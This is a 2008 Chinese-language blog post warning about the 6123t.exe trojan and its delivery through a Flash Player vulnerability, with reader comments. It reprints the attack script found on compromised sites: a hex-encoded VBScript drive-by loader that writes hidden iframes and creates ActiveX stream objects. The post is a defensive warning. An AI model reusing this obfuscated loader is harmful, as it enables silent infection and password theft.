2008年5月30日 星期五

6123t.EXE病毒

近日瀏覽網頁時, 突然ZoneAlarm跳出一個視窗, 詢問是否執行6123t.exe? 當然當下馬上將此程式阻擋, 很難想像如果沒有防火牆的話, 不知又要造成什麼損失 ...

該檔案存在C:\目錄下

檔案名稱 : 6123t.exe
檔案大小 : 13840 byte
檔案類型 : MS-DOS executable (EXE), OS/2 or MS Windows

根據初步瞭解, 該檔案為木馬程式, 會偷取硬碟中的資料, 目前所有防毒軟體都沒有相關訊息, 似乎也都無法防堵, 現在中國大陸已經有多起中毒事件

如果您的電腦在C:\下存在6123t.exe, 而您沒有安裝額外防火牆的話, 就可能已經中毒了, 在尚未確認刪除以前, 就暫時拔掉網路線吧 ...

(追蹤報導)

已經查出來源, 該病毒似乎與此次Flash出問題有關, 並且exe檔未必都是6123t

Adobe Flash Player出現漏洞, 在Adobe釋出修補程式前,最好暫時關閉Flash外掛(或更新到最新版)

當網友瀏覽被入侵的網站時, 會執行以下javascript:

Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756
D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622
E5365744174747269627574652022636C6173736964222C2022636C7369643A424
43936433535362D363541332D313144302D393833412D303043303446433239453
336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224
1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756
D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637
56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7
377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746
52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206
865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7
7726974652028223C694672616D65207352633D6E65772E68746D2077696474683
D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090
9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7
02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222
90D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)

這段經Hex2Str後解碼就不列出了, 它會執行
flash.swf
real.htm
new.htm
help.htm

當啟動flash.swf, 會以URLMON.DLL去下載6123t.exe並執行, 執行後便會將卡巴斯基disable, 並解開ow.dll成為keyboard hook dll, 這個dll就可以監聽鍵盤的輸入, 因此該病毒應該是要偷取密碼

目前尚未中毒的電腦, 最好的方式就是先下載Adoble Flash到9.0.124版本, 並隨時注意Adobe新聞以更新flash的patch

由於被植入惡意程式的網站會越來越多, 預計災情會持續發燒

標籤: ,

張貼者:admin@上午 8:12 引用網址   3 個意見

加入書籤 :

3 個意見:

2008年5月30日 上午 9:12 , Anonymous admin 提到...

此病毒後續的追蹤與解毒會再提供 ...

 
2008年5月31日 上午 3:20 , Anonymous Kenny 提到...

小弟的桌上型電腦前幾天就是中了這個,剛中時,用NB在網路上找好久,都沒相關訊息,後來只好用Ghost還原回去。

 
2008年5月31日 上午 11:34 , Anonymous 匿名 提到...

目前台灣的網頁只有這裡公佈這個病毒的訊息
這個病毒的防治除了更新flash到9.0.124之外,沒有其他方式了,也未有經證實的除毒方法
所有防毒公司都未發佈訊息
美國與中國大陸都已經傳出災情,台灣的網路安全相關單位都還在睡覺中...

 

張貼意見

<< 首頁